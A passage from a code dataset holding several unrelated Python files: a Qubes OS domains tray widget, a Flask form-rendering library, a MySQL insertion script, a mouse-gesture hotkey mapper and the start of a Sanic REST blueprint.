'Halted':\n self.hide()\n return\n self.show_all()\n\n if state in ['Running', 'Paused']:\n self.hide_spinner()\n else:\n self.show_spinner()\n colormap = {'Paused': 'grey', 'Crashed': 'red', 'Transient': 'red'}\n if state in colormap:\n self.name.label.set_markup(\n f'{self.vm.name}')\n else:\n self.name.label.set_label(self.vm.name)\n\n self._set_submenu(state)\n\n def update_stats(self, memory_kb, cpu_usage):\n self.memory.update_state(int(memory_kb))\n self.cpu.update_state(int(cpu_usage))\n\n\nclass DomainTray(Gtk.Application):\n ''' A tray icon application listing all but halted domains. ” '''\n\n def __init__(self, app_name, qapp, dispatcher, stats_dispatcher):\n super().__init__()\n self.qapp = qapp\n self.dispatcher = dispatcher\n self.stats_dispatcher = stats_dispatcher\n\n self.widget_icon: Gtk.StatusIcon = Gtk.StatusIcon()\n self.widget_icon.set_from_icon_name('qui-domains-scalable')\n self.widget_icon.connect('button-press-event', self.show_menu)\n self.widget_icon.set_tooltip_markup(\n _('Qubes Domains\\nView and manage running domains.'))\n\n self.tray_menu = Gtk.Menu()\n\n self.icon_cache = IconCache()\n\n self.menu_items = {}\n\n self.unpause_all_action = Gio.SimpleAction.new('do-unpause-all', None)\n self.unpause_all_action.connect('activate', self.do_unpause_all)\n self.add_action(self.unpause_all_action)\n self.pause_notification_out = False\n\n # add refreshing tooltips with storage info\n GObject.timeout_add_seconds(120, self.refresh_tooltips)\n\n self.register_events()\n self.set_application_id(app_name)\n self.register() # register Gtk Application\n\n def register_events(self):\n self.dispatcher.add_handler('connection-established', self.refresh_all)\n self.dispatcher.add_handler('domain-pre-start', self.update_domain_item)\n self.dispatcher.add_handler('domain-start', self.update_domain_item)\n self.dispatcher.add_handler('domain-start-failed',\n self.update_domain_item)\n self.dispatcher.add_handler('domain-paused', self.update_domain_item)\n self.dispatcher.add_handler('domain-unpaused', self.update_domain_item)\n self.dispatcher.add_handler('domain-shutdown', self.update_domain_item)\n self.dispatcher.add_handler('domain-pre-shutdown',\n self.update_domain_item)\n self.dispatcher.add_handler('domain-shutdown-failed',\n self.update_domain_item)\n\n self.dispatcher.add_handler('domain-add', self.add_domain_item)\n self.dispatcher.add_handler('domain-delete', self.remove_domain_item)\n\n self.dispatcher.add_handler('domain-pre-start', self.emit_notification)\n self.dispatcher.add_handler('domain-start', self.emit_notification)\n self.dispatcher.add_handler('domain-start-failed',\n self.emit_notification)\n self.dispatcher.add_handler('domain-pre-shutdown',\n self.emit_notification)\n self.dispatcher.add_handler('domain-shutdown', self.emit_notification)\n self.dispatcher.add_handler('domain-shutdown-failed',\n self.emit_notification)\n\n self.dispatcher.add_handler('domain-start', self.check_pause_notify)\n self.dispatcher.add_handler('domain-paused', self.check_pause_notify)\n self.dispatcher.add_handler('domain-unpaused', self.check_pause_notify)\n self.dispatcher.add_handler('domain-shutdown', self.check_pause_notify)\n\n self.dispatcher.add_handler('domain-feature-set:updates-available',\n self.feature_change)\n self.dispatcher.add_handler('domain-feature-delete:updates-available',\n self.feature_change)\n self.dispatcher.add_handler('property-set:netvm', self.property_change)\n self.dispatcher.add_handler('property-set:label', self.property_change)\n\n self.stats_dispatcher.add_handler('vm-stats', self.update_stats)\n\n def show_menu(self, _unused, event):\n self.tray_menu.popup_at_pointer(event) # None means current event\n\n def emit_notification(self, vm, event, **kwargs):\n notification = Gio.Notification.new(_(\n \"Qube Status: {}\"). format(vm.name))\n notification.set_priority(Gio.NotificationPriority.NORMAL)\n\n if event == 'domain-start-failed':\n notification.set_body(_('Qube {} has failed to start: {}').format(\n vm.name, kwargs['reason']))\n notification.set_priority(Gio.NotificationPriority.HIGH)\n notification.set_icon(\n Gio.ThemedIcon.new('dialog-warning'))\n elif event == 'domain-pre-start':\n notification.set_body(_('Qube {} is starting.').format(vm.name))\n elif event == 'domain-start':\n notification.set_body(_('Qube {} has started.').format(vm.name))\n elif event == 'domain-pre-shutdown':\n notification.set_body(\n _('Qube {} is attempting to shut down.').format(vm.name))\n elif event == 'domain-shutdown':\n notification.set_body(_('Qube {} has shut down.').format(vm.name))\n elif event == 'domain-shutdown-failed':\n notification.set_body(\n _('Qube {} failed to shut down: {}').format(\n vm.name, kwargs['reason']))\n notification.set_priority(Gio.NotificationPriority.HIGH)\n notification.set_icon(\n Gio.ThemedIcon.new('dialog-warning'))\n else:\n return\n self.send_notification(None, notification)\n\n def emit_paused_notification(self):\n if not self.pause_notification_out:\n notification = Gio.Notification.new(_(\"Your qubes have been \"\n \"paused!\"))\n notification.set_body(_(\n \"All your qubes are currently paused. If this was an accident, \"\n \"simply click \\\"Unpause All\\\" to unpause them. Otherwise, \"\n \"you can unpause individual qubes via the Qubes Domains \"\n \"tray widget.\"))\n notification.set_icon(\n Gio.ThemedIcon.new('dialog-warning'))\n notification.add_button(_('Unpause All'), 'app.do-unpause-all')\n notification.set_priority(Gio.NotificationPriority.HIGH)\n self.send_notification('vms-paused', notification)\n self.pause_notification_out = True\n\n def withdraw_paused_notification(self):\n if self.pause_notification_out:\n self.withdraw_notification('vms-paused')\n self.pause_notification_out = False\n\n def do_unpause_all(self, _vm, *_args, **_kwargs):\n for vm_name in self.menu_items:\n try:\n self.qapp.domains[vm_name].unpause()\n except exc.QubesException:\n # we may not have permission to do that\n pass\n\n def check_pause_notify(self, _vm, _event, **_kwargs):\n if self.have_running_and_all_are_paused():\n self.emit_paused_notification()\n else:\n self.withdraw_paused_notification()\n\n def have_running_and_all_are_paused(self):\n found_paused = False\n for vm in self.qapp.domains:\n if vm.klass != 'AdminVM':\n if vm.is_running():\n if vm.is_paused():\n # a running that is paused\n found_paused = True\n else:\n # found running that wasn't paused\n return False\n return found_paused\n\n def add_domain_item(self, _submitter, event, vm, **_kwargs):\n \"\"\"Add a DomainMenuItem to menu; if event is None, this was fired\n manually (mot due to domain-add event, and it is assumed the menu items\n are created in alphabetical order. Otherwise, this method will\n attempt to sort menu items correctly.\"\"\"\n # check if it already exists\n try:\n vm = self.qapp.domains[str(vm)]\n except KeyError:\n # the VM was not created successfully or was deleted before the\n # event was fully handled\n return\n if vm in self.menu_items:\n return\n\n state = STATE_DICTIONARY.get(event)\n if not state:\n try:\n state = vm.get_power_state()\n except exc.QubesException:\n # VM might have been already destroyed\n if vm not in self.qapp.domains:\n return\n # or we might not have permission to access its power state\n state = 'Halted'\n\n domain_item = DomainMenuItem(vm, self, self.icon_cache, state=state)\n if not event: # menu item creation at widget start; we can assume\n # menu items are created in alphabetical order\n self.tray_menu.add(domain_item)\n else:\n position = 0\n for i in self.tray_menu: # pylint: disable=not-an-iterable\n if not hasattr(i, 'vm'): # we reached the end\n break\n if not i.vm: # header should be skipper\n position += 1\n continue\n if i.vm.klass == 'AdminVM':\n # AdminVM(s) should be skipped\n position += 1\n continue\n if i.vm.name > vm.name:\n # we reached correct alphabetical placement for the VM\n break\n position += 1\n self.tray_menu.insert(domain_item, position)\n self.menu_items[vm] = domain_item\n\n def property_change(self, vm, event, *_args, **_kwargs):\n if vm not in self.menu_items:\n return\n if event == 'property-set:netvm':\n self.menu_items[vm].name.update_tooltip(netvm_changed=True)\n elif event == 'property-set:label':\n self.menu_items[vm].set_label_icon()\n\n def feature_change(self, vm, *_args, **_kwargs):\n if vm not in self.menu_items:\n return\n self.menu_items[vm].name.update_updateable()\n\n def refresh_tooltips(self):\n for item in self.menu_items.values():\n if item.vm and item.is_visible():\n try:\n item.name.update_tooltip(storage_changed=True)\n except Exception: # pylint: disable=broad-except\n pass\n\n def remove_domain_item(self, _submitter, _event, vm, **_kwargs):\n if vm not in self.menu_items:\n return\n vm_widget = self.menu_items[vm]\n self.tray_menu.remove(vm_widget)\n del self.menu_items[vm]\n\n def handle_domain_shutdown(self, vm):\n try:\n if getattr(vm, 'klass', None) == 'TemplateVM':\n for menu_item in self.menu_items.values():\n try:\n if not menu_item.vm.is_running():\n # A VM based on this template can only be\n # outdated if the VM is currently running.\n continue\n except exc.QubesPropertyAccessError:\n continue\n if getattr(menu_item.vm, 'template', None) == vm and \\\n any(vol.is_outdated()\n for vol in menu_item.vm.volumes.values()):\n menu_item.name.update_outdated(True)\n except exc.QubesVMNotFoundError:\n # attribute not available anymore as VM was removed\n # in the meantime\n pass\n\n def update_domain_item(self, vm, event, **kwargs):\n ''' Update the menu item with the started menu for\n the specified vm in the tray'''\n try:\n item = self.menu_items[vm]\n except exc.QubesPropertyAccessError:\n print(_(\"Unexpected property access error\")) # req by @marmarek\n traceback.print_exc()\n self.remove_domain_item(vm, event, **kwargs)\n return\n except KeyError:\n self.add_domain_item(None, event, vm)\n if not vm in self.menu_items:\n # VM not added - already removed?\n return\n item = self.menu_items[vm]\n\n if event in STATE_DICTIONARY:\n state = STATE_DICTIONARY[event]\n else:\n try:\n state = vm.get_power_state()\n except Exception: # pylint: disable=broad-except\n # it's a fragile DispVM\n state = \"Transient\"\n\n item.update_state(state)\n\n if event == 'domain-shutdown':\n self.handle_domain_shutdown(vm)\n # if the VM was shut down, it is no longer outdated\n item.name.update_outdated(False)\n\n if event in ('domain-start', 'domain-pre-start'):\n # A newly started VM should not be outdated.\n item.name.update_outdated(False)\n item.show_all()\n if event == 'domain-shutdown':\n item.hide()\n\n def update_stats(self, vm, _event, **kwargs):\n if vm not in self.menu_items:\n return\n self.menu_items[vm].update_stats(\n kwargs['memory_kb'], kwargs['cpu_usage'])\n\n def initialize_menu(self):\n self.tray_menu.add(DomainMenuItem(None, self, self.icon_cache))\n\n # Add AdminVMS\n for vm in sorted([vm for vm in self.qapp.domains\n if vm.klass == \"AdminVM\"]):\n self.add_domain_item(None, None, vm)\n\n # and the rest of them\n for vm in sorted([vm for vm in self.qapp.domains\n if vm.klass != 'AdminVM']):\n self.add_domain_item(None, None, vm)\n\n for item in self.menu_items.values():\n try:\n if item.vm and item.vm.is_running():\n item.name.update_tooltip(storage_changed=True)\n item.show_all()\n else:\n item.hide()\n except exc.QubesPropertyAccessError:\n item.hide()\n\n self.tray_menu.add(Gtk.SeparatorMenuItem())\n self.tray_menu.add(QubesManagerItem())\n\n self.connect('shutdown', self._disconnect_signals)\n\n def refresh_all(self, _subject, _event, **_kwargs):\n items_to_delete = []\n for vm in self.menu_items:\n if vm not in self.qapp.domains:\n items_to_delete.append(vm)\n for vm in items_to_delete:\n self.remove_domain_item(None, None, vm)\n for vm in self.qapp.domains:\n self.update_domain_item(vm, '')\n\n def run(self): # pylint: disable=arguments-differ\n self.initialize_menu()\n\n def _disconnect_signals(self, _event):\n self.dispatcher.remove_handler('connection-established',\n self.refresh_all)\n self.dispatcher.remove_handler('domain-pre-start',\n self.update_domain_item)\n self.dispatcher.remove_handler('domain-start', self.update_domain_item)\n self.dispatcher.remove_handler('domain-start-failed',\n self.update_domain_item)\n self.dispatcher.remove_handler('domain-paused', self.update_domain_item)\n self.dispatcher.remove_handler('domain-unpaused',\n self.update_domain_item)\n self.dispatcher.remove_handler('domain-shutdown',\n self.update_domain_item)\n self.dispatcher.remove_handler('domain-pre-shutdown',\n self.update_domain_item)\n self.dispatcher.remove_handler('domain-shutdown-failed',\n self.update_domain_item)\n\n self.dispatcher.remove_handler('domain-add', self.add_domain_item)\n self.dispatcher.remove_handler('domain-delete', self.remove_domain_item)\n\n self.dispatcher.remove_handler('domain-pre-start',\n self.emit_notification)\n self.dispatcher.remove_handler('domain-start', self.emit_notification)\n self.dispatcher.remove_handler('domain-start-failed',\n self.emit_notification)\n self.dispatcher.remove_handler('domain-pre-shutdown',\n self.emit_notification)\n self.dispatcher.remove_handler('domain-shutdown',\n self.emit_notification)\n self.dispatcher.remove_handler('domain-shutdown-failed',\n self.emit_notification)\n\n self.dispatcher.remove_handler('domain-start', self.check_pause_notify)\n self.dispatcher.remove_handler('domain-paused', self.check_pause_notify)\n self.dispatcher.remove_handler('domain-unpaused',\n self.check_pause_notify)\n self.dispatcher.remove_handler('domain-shutdown',\n self.check_pause_notify)\n\n self.dispatcher.remove_handler('domain-feature-set:updates-available',\n self.feature_change)\n self.dispatcher.remove_handler(\n 'domain-feature-delete:updates-available', self.feature_change)\n self.dispatcher.remove_handler('property-set:netvm',\n self.property_change)\n self.dispatcher.remove_handler('property-set:label',\n self.property_change)\n\n self.stats_dispatcher.remove_handler('vm-stats', self.update_stats)\n\n\ndef main():\n ''' main function '''\n qapp = qubesadmin.Qubes()\n dispatcher = qubesadmin.events.EventsDispatcher(qapp)\n stats_dispatcher = qubesadmin.events.EventsDispatcher(\n qapp, api_method='admin.vm.Stats')\n app = DomainTray(\n 'org.qubes.qui.tray.Domains', qapp, dispatcher, stats_dispatcher)\n app.run()\n\n loop = asyncio.get_event_loop()\n tasks = [\n asyncio.ensure_future(dispatcher.listen_for_events()),\n asyncio.ensure_future(stats_dispatcher.listen_for_events()),\n ]\n\n return qui.utils.run_asyncio_and_show_errors(loop, tasks,\n \"Qubes Domains Widget\")\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"qui/tray/domains.py","file_name":"domains.py","file_ext":"py","file_size_in_byte":34521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"620443706","text":"from flask.ext.wtf import Form\nfrom flask import render_template\nfrom wtforms.widgets import TextArea, TextInput\nfrom wtforms.fields import HiddenField, FileField\nfrom wtforms import fields\nfrom appshell.markup import element, button, link_button, GridColumn\nfrom markupsafe import Markup\nfrom flask.ext.babelex import Babel, Domain\nfrom itertools import chain\nfrom hashlib import sha256\nfrom appshell.widgets import ClientSideTabbar\nfrom appshell import View\nfrom appshell.templates import single_view\n\nmydomain = Domain('appshell')\n_ = mydomain.gettext\nlazy_gettext = mydomain.lazy_gettext\n\n\nclass OrderedForm(Form):\n def __iter__(self):\n fields = list(super(OrderedForm, self).__iter__())\n field_order = getattr(self, 'field_order', None)\n if field_order:\n temp_fields = []\n for name in field_order:\n if name == '*':\n temp_fields.extend([f for f in fields\n if f.name not in field_order])\n else:\n temp_fields.append([f for f in fields\n if f.name == name][0])\n fields =temp_fields\n return iter(fields)\n \n field_order = ['*','ok']\n\nclass BootstrapMarkdown(TextArea):\n def __init__(self, rows=10):\n self.rows = rows\n\n def __call__(self, field, **kwargs):\n kwargs['rows'] = self.rows\n c = kwargs.pop('class', '') or kwargs.pop('class_', '')\n kwargs['class'] = u'%s %s' % (\"bootstrap-markdown\", c)\n return super(BootstrapMarkdown, self).__call__(field, **kwargs)\n\nclass DateWidget(TextInput):\n def __call__(self, field, **kwargs):\n i = super(DateWidget, self).__call__(field, **kwargs)\n \n i = Markup(\"\"\"
    \n {} \n \n
    \"\"\").format(i)\n return i\n\nclass DateField(fields.DateField):\n widget = DateWidget()\n \n \n\nfield_renderers = {}\n\nclass FieldRenderer(object):\n __slots__ = [\"view\", \"field\", \"kwargs\", \"form_info\"]\n def __init__(self, view, field, form_info=None, **kwargs):\n self.view = view\n self.field = field\n self.kwargs = kwargs\n self.form_info = form_info\n\n def render_input(self):\n args = self.view.get_field_args(self.field)\n args.update(self.kwargs)\n return Markup(self.field(**args))\n\n def render_errors(self):\n if self.field.errors:\n return Markup(\"\").join((element(\"p\", self.view.error_attrs, i)\n for i in self.field.errors))\n else:\n return \"\"\n\n def render_description(self):\n if self.field.description:\n return element(\"p\", self.view.description_attrs,\n self.field.description)\n else:\n return \"\"\n\n def render_label(self):\n return self.field.label(**self.view.label_args)\n \n def __html__(self):\n l = self.render_label()\n\n i = Markup(\"{}{}{}\").format(self.render_input(),\n self.render_description(),\n self.render_errors())\n \n if self.view.field_div_attrs:\n i = element(\"div\", self.view.field_div_attrs, i)\n\n return l+i\n\nclass FormButton(object):\n __slots__ = [\"content\"]\n \n def __init__(self, content, **kwargs):\n self.content = content\n\n def __html__(self):\n return self.render(view=None, form_info=None)\n \nclass SubmitButton(FormButton):\n __slots__ = [\"name\", \"value\", \"action\", \"context_class\"]\n \n def __init__(self, text,\n name=None,\n value=None,\n action=None,\n context_class=\"primary\",\n **kwargs):\n super(SubmitButton, self).__init__(content=text, **kwargs)\n self.name = name\n self.value = value\n self.action = action\n self.context_class = context_class\n \n def render(self, view, form_info=None):\n attrs = {\"type\": \"submit\"}\n \n if self.name is not None:\n attrs[\"name\"] = self.name\n if self.value is not None:\n attrs[\"value\"] = self.value\n if self.action is not None:\n attrs[\"formaction\"] = self.action\n \n return button(self.content,\n context_class=self.context_class,\n attrs=attrs)\n\nclass ButtonGroup(FormButton):\n def get_div_attrs(self):\n return {\"class\": \"btn-group\"}\n \n def render(self, view, **kwargs):\n if not self.content:\n return \"\"\n \n c = Markup(\"\").join((i.render(self) if isinstance(i, FormButton) else i\n for i in self.content))\n return element(\"div\", self.get_div_attrs(), c)\n \n \nclass FormView(object):\n def __init__(self,\n buttons=None,\n method=\"POST\",\n **kwargs):\n self.field_renderers = {}\n self.label_args = {}\n self.field_div_attrs = None\n self.form_attrs = {}\n self.button_bar_attrs = {}\n self.method = method\n self.error_attrs = {}\n self.description_attrs = {}\n if buttons is None:\n self.buttons = [SubmitButton(lazy_gettext(\"OK\"))]\n else:\n self.buttons = buttons\n \n def get_field_args(self, field):\n return {}\n \n def render_field(self, field, form_info=None, **kwargs):\n if field.type in field_renderers:\n r = field_renderers[field.type]\n else:\n r = FieldRenderer\n return r(self, field, form_info=form_info, **kwargs)\n\n def render_fields(self, fields, form_info=None, **kwargs):\n l = []\n for i in fields:\n if isinstance(i, HiddenField):\n continue\n l.append(self.render_field(i,\n form_info=form_info,\n **kwargs))\n \n return Markup(\"\").join(l)\n\n def hidden_errors(self, form):\n l = (Markup(\"\").join((Markup('

    {}

    ').format(j)\n for j in i.errors))\n for i in form if isinstance(i, HiddenField))\n return Markup(\"\").join(l)\n \n def render(self, form, form_info=None):\n contents=Markup(\"{}{}{}{}\").format(\n form.hidden_tag(),\n self.hidden_errors(form),\n self.render_fields(form, form_info=form_info),\n self.render_footer(form_info=form_info)\n )\n \n attrs = dict(self.form_attrs)\n if any((isinstance(i, FileField) for i in form)):\n attrs[\"enctype\"] = \"multipart/form-data\"\n\n attrs[\"method\"] = self.method\n \n return element(\"form\", attrs, contents)\n\n def render_footer(self, form_info=None):\n if not self.buttons:\n return \"\"\n \n c = Markup(\"\").join((i.render(self, form_info=form_info)\n if isinstance(i, FormButton) else i\n for i in self.buttons))\n return element(\"div\", self.button_bar_attrs, c)\n\n def get_formfield_view(self):\n return self\n \n def __call__(self, form, form_info=None):\n return RenderProxy(self, form, form_info=form_info)\n\nclass RenderProxy(object):\n __slots__ = [\"obj\", \"args\", \"kwargs\"]\n \n def __init__(self, obj, *args, **kwargs):\n self.obj = obj\n self.args = args\n self.kwargs = kwargs\n \n def __html__(self):\n return self.obj.render(*self.args, **self.kwargs)\n\ndef field_renderer(t):\n def wrap(cls):\n field_renderers[t] = cls\n return cls\n return wrap\n\n@field_renderer('RadioField')\nclass RadioFieldRenderer(FieldRenderer):\n def render_input(self):\n itms = (Markup('
    ').\n format(Markup(i), Markup(i.label.text))\n for i in self.field)\n return Markup(\"\").join(itms)\n\n\n@field_renderer('BooleanField')\nclass BooleanFieldRenderer(FieldRenderer):\n def render_input(self):\n return Markup(self.field(**self.kwargs))\n \n def __html__(self):\n l = \"\"\n if self.view.label_args:\n l = element(\"div\", self.view.label_args, \"\")\n\n i = Markup('
    {}{}
    ')\\\n .format(self.render_input(),\n self.field.label.text,\n self.render_description(),\n self.render_errors())\n \n if self.view.field_div_attrs:\n i = element(\"div\", self.view.field_div_attrs, i)\n\n return l+i\n\n@field_renderer('FormField')\nclass FormFieldRenderer(FieldRenderer):\n def render_input(self):\n v = self.view.get_formfield_view()\n c = Markup(\"{}{}\").format(self.field.hidden_tag(),\n v.render_fields(self.field,\n form_info=self.form_info))\n return element(\"div\", v.form_attrs, c)\n \n def render_errors(self):\n return \"\"\n \nclass VerticalFormView(FormView):\n formfield_view = None\n \n def __init__(self, formfield_view=None, **kwargs):\n super(VerticalFormView, self).__init__(**kwargs)\n if any((isinstance(i, ButtonGroup) for i in self.buttons)):\n self.button_bar_attrs = {\"class\": \"btn-toolbar\"}\n self.error_attrs = {\"class\": \"help-block\"}\n self.description_attrs = {\"class\": \"help-block\"}\n if formfield_view is not None:\n self.formfield_view = formfield_view\n \n def render_field(self, field, **kwargs):\n cls = \"form-group\"\n if field.errors:\n cls += \" has-error\"\n if field.flags.required:\n cls += \" required\"\n \n return element(\"div\", {\"class\": cls},\n super(VerticalFormView, self).render_field(field,\n **kwargs)) \n def get_field_args(self, field):\n return {\"class\": \"form-control\"}\n\n def get_formfield_view(self):\n return self.formfield_view or HorizontalFormView()\n\n \nclass HorizontalFormView(VerticalFormView):\n def __init__(self, widths=[3, 9], size=\"md\", **kwargs):\n super(HorizontalFormView, self).__init__(**kwargs)\n self.label_args= {\"class\": \"control-label col-{}-{}\".format(size,\n widths[0])}\n self.field_div_attrs = {\"class\": \"col-{}-{}\".format(size, widths[1])}\n self.form_attrs = {\"class\": \"form-horizontal\"}\n \nclass FormPart(object):\n __slots__ = [\"fields\", \"view\", \"name\", \"title\"]\n def __init__(self, title, view, fields=None, name=None):\n self.title = title\n self.view = view\n if fields is None:\n self.fields = view.get_owned_fields()\n else:\n self.fields = fields\n\n if name is None:\n self.name = \"form-part-\" + sha256(title).hexdigest()\n else:\n self.name = name\n \n def get_owned_fields(self):\n return self.fields\n\n def filter_own_fields(self, fields):\n own = []\n own_set = set()\n rest = []\n\n for i in self.get_owned_fields():\n for j in fields:\n if j.name == i:\n own.append(j)\n own_set.add(j)\n\n rest = [i for i in fields if i not in own_set]\n\n return own, rest\n \nclass HierarchicalFormView(FormView):\n def __init__(self, rest_view=None, **kwargs):\n super(HierarchicalFormView, self).__init__(**kwargs)\n self.rest_view = rest_view\n self.parts = []\n \n def get_owned_fields(self):\n return chain(*(i.get_owned_fields() for i in self.tabs))\n\n def add_part(self, part):\n self.parts.append(part)\n\n \nclass TabbedFormView(HierarchicalFormView):\n def add_tab(self, title, fields=None, view=None, name=None):\n if view is None:\n view = HorizontalFormView()\n self.add_part(FormPart(title, view, fields=fields, name=name))\n\n def render_fields(self, fields, form_info=None):\n tb = ClientSideTabbar()\n f = fields\n for i in self.parts:\n of, f = i.filter_own_fields(f)\n\n t = i.title\n\n if any((i.errors for i in of)):\n t = Markup(' {}').format(t) \n \n tb.add_tab(t,\n element(\"div\",\n i.view.form_attrs,\n i.view.render_fields(of, form_info=form_info)),\n name=i.name)\n rest = \"\"\n if f:\n if not self.rest_view:\n raise ValueError(\"Not all fields assigned to parts\")\n \n rest = element(\"div\",\n self.rest_view.form_attrs,\n self.rest_view.render_fields(f,\n form_info=form_info))\n\n return Markup(\"{}{}\").format(rest, tb)\n\nclass FormPanel(FormPart):\n __slots__ = [\"footer\", \"width\", \"border\", \"column\"]\n def __init__(self, view,\n title=None, footer=None, name=None,\n width=None,\n column=None,\n border=\"default\",\n **kwargs):\n \n if name is None:\n name = \"form-panel-\" + sha256(u\"{}{}\".format(title,\n footer)).hexdigest()\n\n super(FormPanel, self).__init__(title, view,\n name=name,\n **kwargs)\n\n self.footer = footer\n self.width = width\n self.border = border\n if column is None:\n if width is not None:\n column = GridColumn(width=width)\n self.column = column\n\n def should_be_wrapped_in_row(self):\n return self.column is not None\n \n def panel_wrapper(self, content):\n if self.border is not None:\n content = element(\"div\",\n {\"class\": \"panel-body\"},\n content)\n\n if self.title is not None:\n content = element(\"div\",\n {\"class\": \"panel-heading\"},\n self.title) + content\n \n content = element(\"div\",\n {\"class\": \"panel panel-{}\".format(self.border)},\n content)\n\n\n if self.column:\n content = self.column.render(content)\n \n return content\n \nclass PanelizedFormView(HierarchicalFormView):\n def __init__(self, breakpoint='md', **kwargs):\n super(PanelizedFormView, self).__init__(**kwargs)\n self.breakpoint = breakpoint\n \n def add_panel(self,\n title=None,\n fields=None,\n width=None,\n column=None,\n footer=None,\n view=None,\n name=None,\n border=\"default\"):\n if view is None:\n view = VerticalFormView()\n \n self.add_part(FormPanel(view,\n title=title,\n footer=footer,\n fields=fields,\n name=name,\n border=border,\n width=width,\n column=column))\n\n def render_fields(self, fields, form_info=None):\n f = fields\n output = []\n to_wrap = []\n wrapped = False\n for i in self.parts:\n of, f = i.filter_own_fields(f)\n\n t = i.title\n\n fm = element(\"div\",\n i.view.form_attrs,\n i.view.render_fields(of,\n form_info=form_info))\n\n if i.should_be_wrapped_in_row():\n to_wrap.append(i.panel_wrapper(fm))\n \n else:\n if to_wrap:\n output.append(element(\"div\",\n {\"class\": \"row\"},\n Markup(\"\").join(to_wrap)))\n to_wrap = []\n\n output.append(i.panel_wrapper(fm))\n\n if to_wrap:\n output.append(element(\"div\",\n {\"class\": \"row\"},\n Markup(\"\").join(to_wrap)))\n \n return Markup(\"\").join(output)\n \n \n \nclass FormEndpoint(View):\n methods = ['GET', 'POST']\n formview = HorizontalFormView()\n\n def get_form_info(self):\n return {}\n \n def dispatch_request(self, **kwargs):\n self.form = self.create_form(**kwargs)\n if self.form.validate_on_submit():\n res = self.submitted(**kwargs)\n if res is not None:\n return res\n return self.render_form(**kwargs)\n \n def render_form(self, **kwargs):\n return self.render_template(self.formview(self.form,\n form_info=self.get_form_info()))\n\n \n","sub_path":"appshell/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":17830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"597248800","text":"#! /usr/bin/python\n# -*- coding: utf-8 -*-\n\n\nimport os\nimport sys\n\nsep = os.path.sep\nproj_dir = os.path.normpath(os.path.dirname(os.path.abspath(__file__)).split('sbin')[0])\nif proj_dir not in sys.path:\n sys.path.insert(0, proj_dir)\nfrom com.ericsson.xn.commons.CommonUtil import pre_check\npre_check(['Linux', 'Darwin', 'Windows'], False, True)\n\nfrom com.ericsson.xn.dbcommons.MysqlCommons import DbInstance\nfrom com.ericsson.xn.commons.PyProperties import Properties\n\n\ndef insert_a_ne(db_instance):\n ne_dir = os.path.normpath(proj_dir + sep + 'config' + sep + 'mysql_conf' + sep + 'nes')\n f_list = os.listdir(ne_dir)\n ne_file = os.path.normpath(ne_dir + sep + 'ne')\n ne_dict = Properties(ne_file, True).get_map()\n id = db_instance.get_max_nes_id() + 1\n db_instance.insert_ne(ne_dict, id)\n\n\ndef init_connect():\n db_file = os.path.normpath(proj_dir + sep + 'config' + sep + 'mysql_conf' + sep + 'db')\n db = Properties(db_file, True).get_map()\n i = DbInstance(db['host'], db['username'], db['password'], int(db['port']), db['database'])\n if i.connect():\n return i\n\nif __name__ == '__main__':\n i = init_connect()\n if i:\n insert_a_ne(i)\n i.close()\n\n'''\ndb = DbInstance('192.168.96.133', 'root', 'root', 3306, 'xoam')\nif db.connect():\n print db.insert_ne(None)\ndb.close()\n'''","sub_path":"sbin/db_actions_main.py","file_name":"db_actions_main.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"233953685","text":"import pyautogui as gui\nimport os\n\nGEST_START = (\"N\", \"E\", \"S\", \"W\")\nGEST_CLOSE = (\"SE\", \"N\", \"SW\")\nGEST_COPY = (\"W\", \"S\", \"E\")\nGEST_PASTE = (\"SE\", \"NE\")\nGEST_CUT = (\"SW\", \"N\", \"SE\")\nGEST_ALT_TAB = (\"SE\", \"SW\")\nGEST_ALT_SHIFT_TAB = (\"SW\", \"SE\")\nGEST_MAXIMISE = (\"N\",)\nGEST_MINIMISE = (\"S\",)\nGEST_LOCK = (\"S\", \"E\")\nGEST_TASK_MANAGER = (\"E\", \"W\", \"S\")\nGEST_NEW_FILE = (\"N\", \"SE\", \"N\")\nGEST_SELECT_ALL = (\"NE\", \"SE\", \"NW\", \"W\")\n\nGESTURES = {GEST_CUT: ('ctrlleft', 'x'),\nGEST_CLOSE: ('altleft', 'f4'),\nGEST_ALT_SHIFT_TAB: ('altleft', 'shiftleft', 'tab'),\nGEST_PASTE: ('ctrlleft', 'v'),\nGEST_ALT_TAB: ('altleft', 'tab'),\nGEST_COPY: ('ctrlleft', 'c'),\nGEST_NEW_FILE: ('ctrlleft', 'n'),\nGEST_SELECT_ALL: ('ctrlleft', 'a')}\n\nif os.name == 'nt':\n GESTURES[GEST_START] = ('winleft',)\n GESTURES[GEST_LOCK] = ('winleft', 'l')\n GESTURES[GEST_TASK_MANAGER] = ('ctrlleft', 'shiftleft', 'esc')\nelse:\n GESTURES[GEST_START] = ('altleft', 'f1')\n GESTURES[GEST_LOCK] = ('ctrlleft', 'altleft', 'l')\n GESTURES[GEST_TASK_MANAGER] = ('ctrlleft', 'esc')\n\ndef do_gesture_action(gesture):\n if gesture in GESTURES.keys():\n keys = list(GESTURES[gesture])\n last_key = keys.pop()\n if len(keys) >= 1:\n for key in keys:\n gui.keyDown(key)\n gui.press(last_key)\n if len(keys) >= 1:\n keys.reverse()\n for key in keys:\n gui.keyUp(key)\n","sub_path":"gesture_api.py","file_name":"gesture_api.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"631301524","text":"import sys\nimport inspect\n\nfrom sanic import Sanic, Blueprint\nfrom sanic.response import json, text, HTTPResponse\n\nfrom . import default_processor\nfrom .utils import ok, fail\nfrom trump import log\n\n\nbp = Blueprint('restapi')\n\napp = None\n\nlogger = log.Logger(__name__)\n\n\nasync def user_loader(app, request):\n request['user'] = request.get('session', {}).get('user')\n\n\nasync def _process(method, app, request, name, *args, **kargs):\n if app.views.get(name) and hasattr(app.views.get(name), method):\n # pre process\n func = getattr(app.views.get(name), method)\n if hasattr(func, 'login_required') and getattr(func, 'login_required') == False:\n pass\n else:\n if not request.get('user'):\n return fail('Not login.', status=401)\n result = await func(app, request, *args)\n if isinstance(result, 